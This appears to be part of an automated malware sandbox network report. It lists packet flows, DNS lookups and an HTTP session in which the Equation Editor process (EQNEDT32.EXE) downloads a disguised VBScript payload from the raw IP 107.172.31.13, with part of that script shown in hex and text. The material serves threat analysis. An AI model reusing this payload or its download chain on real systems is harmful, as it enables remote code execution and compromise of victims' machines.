                                          Oct 24, 2024 08:59:28.056570053 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.056612968 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.056617975 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.056663990 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.056705952 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.056706905 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.056751013 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.056791067 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.057359934 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.057406902 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.057451010 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.057451010 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.057497978 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.057540894 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.057540894 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.057588100 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.057632923 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.058219910 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.058267117 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.058310032 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.058310986 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.058356047 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.058398008 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.058399916 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.058444977 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.058486938 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.059056997 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.059103966 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.059146881 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.059148073 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.059194088 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.059233904 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.059238911 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.092299938 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.092380047 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.092406988 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.092462063 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.092524052 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.092555046 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.167175055 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.167227983 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.167262077 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.167304039 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.167350054 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.167577982 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.167623997 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.167665958 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.167669058 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.167864084 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.167908907 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.167910099 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.167956114 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.167996883 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.168320894 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.168368101 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.168414116 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.168637037 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.168682098 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.168724060 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.168726921 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.168772936 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.168813944 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.168818951 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.169500113 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.169545889 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.169548035 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.169595003 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.169637918 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.169639111 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.169681072 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.169723034 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.169724941 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.170330048 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.170375109 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.170377016 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.170420885 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.170463085 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.170469046 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.170819998 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.170862913 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.170864105 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.170911074 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.170952082 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.170954943 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.171000004 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.171047926 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.171720028 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.171766996 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.171808958 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.171812057 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.171858072 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.171895027 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.171901941 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.171948910 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.171989918 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.172581911 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.172629118 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.172672987 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.172676086 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.172719955 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.172760963 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.172765017 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.173480988 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.173526049 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.173527002 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.173573971 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.173615932 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.173619032 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.173662901 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.173706055 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.173707962 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.174340963 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.174385071 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.174386978 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.174431086 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.174485922 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.174487114 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.174530983 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.174580097 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.175203085 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.175250053 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.175291061 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.175292969 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.175353050 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.175396919 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.175396919 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.175442934 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.175489902 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.208710909 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.208967924 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.209009886 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.209012032 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.209054947 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.209104061 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.283355951 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.283452988 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.283504009 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.283504963 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.283639908 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.283687115 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.283695936 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.283739090 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.283790112 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.284091949 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.284138918 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.284181118 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.284183979 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.284229994 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.284274101 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.284276962 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.284318924 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.284365892 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.284369946 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.285032988 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.285079002 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.285079956 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.285125971 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.285170078 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.285171986 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.285218000 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.285262108 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.285264015 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.285307884 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.285350084 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.285974026 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.286020994 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.286065102 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.286067009 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.286113024 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.286158085 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.286158085 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.286204100 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.286247015 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.286248922 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.286909103 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.286955118 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.286958933 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.287000895 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.287041903 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.287046909 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.287091017 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.287131071 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.287133932 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.287179947 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.287220955 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.287863016 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.287910938 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.287955046 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.287956953 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.288003922 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.288045883 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.288048029 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.288094044 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.288135052 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.288137913 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.288790941 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.288837910 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.288841009 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.288882971 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.288928032 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.288928032 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.288975000 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.289016008 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.289020061 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.289702892 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.289747953 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.289748907 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.289793968 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.289835930 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.289839029 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.289884090 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.289925098 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.289928913 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.289974928 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.290018082 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.290656090 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.290703058 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.290747881 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.290750980 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.290792942 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.290836096 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.290838003 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.290883064 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.290925026 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.290930986 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.324976921 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.325046062 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.325051069 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.325100899 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.325145960 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.325151920 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.325195074 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.325242043 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.399355888 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.399468899 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.399522066 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.399538994 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.399590015 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.399635077 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.399638891 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.399740934 CEST8049168107.172.31.13192.168.2.22
                                          Oct 24, 2024 08:59:28.399791002 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.468894958 CEST4916880192.168.2.22107.172.31.13
                                          Oct 24, 2024 08:59:28.836463928 CEST4916980192.168.2.22208.95.112.1
                                          Oct 24, 2024 08:59:28.842057943 CEST8049169208.95.112.1192.168.2.22
                                          Oct 24, 2024 08:59:28.842206955 CEST4916980192.168.2.22208.95.112.1
                                          Oct 24, 2024 08:59:28.842453003 CEST4916980192.168.2.22208.95.112.1
                                          Oct 24, 2024 08:59:28.847923040 CEST8049169208.95.112.1192.168.2.22
                                          Oct 24, 2024 08:59:29.436485052 CEST8049169208.95.112.1192.168.2.22
                                          Oct 24, 2024 08:59:29.638288021 CEST4916980192.168.2.22208.95.112.1
                                          Oct 24, 2024 09:00:03.467693090 CEST8049169208.95.112.1192.168.2.22
                                          Oct 24, 2024 09:00:03.467904091 CEST4916980192.168.2.22208.95.112.1
                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 24, 2024 08:59:07.766210079 CEST5456253192.168.2.228.8.8.8
                                          Oct 24, 2024 08:59:07.782073975 CEST53545628.8.8.8192.168.2.22
                                          Oct 24, 2024 08:59:09.245877028 CEST5291753192.168.2.228.8.8.8
                                          Oct 24, 2024 08:59:09.267044067 CEST53529178.8.8.8192.168.2.22
                                          Oct 24, 2024 08:59:28.819457054 CEST6275153192.168.2.228.8.8.8
                                          Oct 24, 2024 08:59:28.829941034 CEST53627518.8.8.8192.168.2.22
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Oct 24, 2024 08:59:07.766210079 CEST192.168.2.228.8.8.80xcfbStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                          Oct 24, 2024 08:59:09.245877028 CEST192.168.2.228.8.8.80xcedfStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                          Oct 24, 2024 08:59:28.819457054 CEST192.168.2.228.8.8.80xc364Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Oct 24, 2024 08:59:07.782073975 CEST8.8.8.8192.168.2.220xcfbNo error (0)drive.google.com216.58.212.174A (IP address)IN (0x0001)false
                                          Oct 24, 2024 08:59:09.267044067 CEST8.8.8.8192.168.2.220xcedfNo error (0)drive.usercontent.google.com142.250.186.97A (IP address)IN (0x0001)false
                                          Oct 24, 2024 08:59:28.829941034 CEST8.8.8.8192.168.2.220xc364No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                          • drive.google.com
                                          • drive.usercontent.google.com
                                          • 107.172.31.13
                                          • ip-api.com
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.2249165107.172.31.13803700C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                          TimestampBytes transferredDirectionData
                                          Oct 24, 2024 08:59:04.516045094 CEST328OUTGET /NIGHTTTTMPDW-constraints.vbs HTTP/1.1
                                          Accept: */*
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Host: 107.172.31.13
                                          Connection: Keep-Alive
                                          Oct 24, 2024 08:59:05.176064014 CEST1236INHTTP/1.1 200 OK
                                          Content-Type: text/vbscript
                                          Last-Modified: Wed, 23 Oct 2024 20:47:39 GMT
                                          Accept-Ranges: bytes
                                          ETag: "ff59d4cc8c25db1:0"
                                          Server: Microsoft-IIS/10.0
                                          Date: Thu, 24 Oct 2024 06:59:05 GMT
                                          Content-Length: 138934
                                          Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 28 00 77 00 73 00 6d 00 61 00 6e 00 2c 00 20 00 63 00 6f 00 6e 00 53 00 74 00 72 00 2c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2c 00 20 00 73 00 75 00 62 00 73 00 69 00 6e 00 75 00 6f 00 73 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 61 00 72 00 72 00 61 00 63 00 68 00 6f 00 46 00 6c 00 61 00 67 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 61 00 72 00 72 00 61 00 63 00 68 00 6f 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 [TRUNCATED]
                                          Data Ascii: private function CreateSession(wsman, conStr, optDic, subsinuoso) dim farrachoFlags dim conOpt dim farracho dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword farrachoFlags = 0 proxyAccessType = 0 proxyAccessTypeVal = 0 pr
                                          Oct 24, 2024 08:59:05.176126003 CEST1236INData Raw: 6f 00 78 00 79 00 41 00 75 00 74 00 68 00 65 00 6e 00 74 00 69 00 63 00 61 00 74 00 69 00 6f 00 6e 00 4d 00 65 00 63 00 68 00 61 00 6e 00 69 00 73 00 6d 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00
                                          Data Ascii: oxyAuthenticationMechanism = 0 proxyAuthenticationMechanismVal = 0 proxyUsername = "" proxyPassword = ""
                                          Oct 24, 2024 08:59:05.176165104 CEST424INData Raw: 73 00 20 00 3d 00 20 00 66 00 61 00 72 00 72 00 61 00 63 00 68 00 6f 00 46 00 6c 00 61 00 67 00 73 00 20 00 4f 00 52 00 20 00 77 00 73 00 6d 00 61 00 6e 00 2e 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 46 00 6c 00 61 00 67 00 55 00 54 00 46 00
                                          Data Ascii: s = farrachoFlags OR wsman.SessionFlagUTF8 else ' Invalid! ASSERTBOOL false, "The spe
                                          Oct 24, 2024 08:59:05.176237106 CEST1236INData Raw: 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 4e 00 45 00 4e 00 43 00 52 00 59 00 50 00 54 00 45 00 44 00 29 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00
                                          Data Ascii: sts(NPARA_UNENCRYPTED) then ASSERTBOOL optDic.ArgumentExists(NPARA_REMOTE), "The '-" & NPARA_UNENCRYPTED & "'
                                          Oct 24, 2024 08:59:05.176276922 CEST1236INData Raw: 66 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 41 00 55 00 54 00 48 00 29 00 20 00 74 00 68 00 65 00 6e 00 0d 00
                                          Data Ascii: f optDic.ArgumentExists(NPARA_AUTH) then ASSERTNAL(NPARA_AUTH) authVal = optDic.Argument(NPARA_AUTH)
                                          Oct 24, 2024 08:59:05.176738977 CEST424INData Raw: 20 00 22 00 54 00 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 50 00 41 00 53 00 53 00 57 00 4f 00 52 00 44 00 20 00 26 00 20 00 22 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 69 00 73 00
                                          Data Ascii: "The '-" & NPARA_PASSWORD & "' option is only valid for '-auth:none'" case VAL_BASIC 'Use -
